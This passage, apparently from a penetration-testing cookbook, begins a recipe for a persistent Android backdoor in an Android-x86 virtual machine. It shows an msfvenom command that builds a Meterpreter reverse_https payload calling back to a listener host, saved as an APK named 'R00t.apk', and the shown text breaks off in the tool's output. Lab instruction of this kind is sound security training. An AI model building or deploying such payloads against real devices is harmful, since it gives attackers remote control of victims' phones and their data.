In this recipe, we will create a persistent backdoor for Android devices. Since our objective is to create a controlled test environment, I suggest using a virtual machine running Android OS; this way we can safely test exploits without worries and, when we have finished, we can simply revert to the virtual machine and start over.
I will be using Android-x86 throughout this recipe; to follow along, download the Android-x86-5.1-rc1
ISO from the http://www.android-x86.org/ site, as shown, and create a new virtual machine:
root@kali:~# msfvenom -p android/meterpreter/reverse_https LHOST=192.168.216.5 LPORT=443 R > R00t.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size...